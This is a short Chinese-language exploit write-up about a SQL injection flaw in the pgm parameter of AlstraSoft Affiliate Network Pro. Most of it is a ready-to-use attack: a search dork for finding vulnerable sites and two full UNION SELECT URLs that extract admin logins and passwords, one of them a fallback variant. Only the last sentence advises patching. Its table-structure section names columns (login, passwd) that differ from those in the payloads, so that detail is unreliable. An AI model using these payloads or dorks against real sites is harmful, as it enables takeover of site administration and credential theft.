AlstraSoft Affiliate Network Pro (pgm) 远程 SQL 注入漏洞
近期,安全研究人员披露了一个影响 AlstraSoft Affiliate Network Pro 的高危 SQL 注入漏洞。该联盟网络管理脚本因参数过滤机制存在明显缺陷,导致严重安全隐患。攻击者只需构造一个特制 URL,即可远程提取管理员登录凭据,攻击手法简单直接,威胁性极高。
受影响脚本与搜索特征
受影响脚本来自 www.alstrasoft.com/affiliate.htm。若在搜索引擎中搜索关键词如 "Affiliate Network Pro" 或使用 inurl:"index.php?Act=directory" 发现相关页面,很可能就是该易受攻击的应用。
漏洞利用细节
漏洞存在于 index.php 文件的 pgm 参数中。攻击者可通过 joinstatus=pgmwise 触发注入点,随后直接构造 UNION 查询,获取管理后台的登录名与密码。
以下是最直接的利用方式:
www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1 union select 1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61 from partners_admin--
如果目标表结构略有差异,也可尝试缩短的版本:
www.[target].com/Script/index.php?Act=directory&joinstatus=pgmwise&pgm=-1 union select 1,2,3,concat_ws(0x3a,admin_login,admin_password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 from partners_admin--
两种利用方式均从 partners_admin 表中提取 admin_login 和 admin_password 字段,并以冒号拼接输出。第二个版本减少了列数,适用于列数较少的场景。
表结构参考
目标表 partners_admin 中包含以下关键列:
column_name
login
passwd
如果注入结果返回的密码为明文或可逆加密,则整个后台管理权限将完全暴露。强烈建议所有使用该脚本的管理员立即检查版本,及时升级或安装补丁,以防范此类远程攻击。
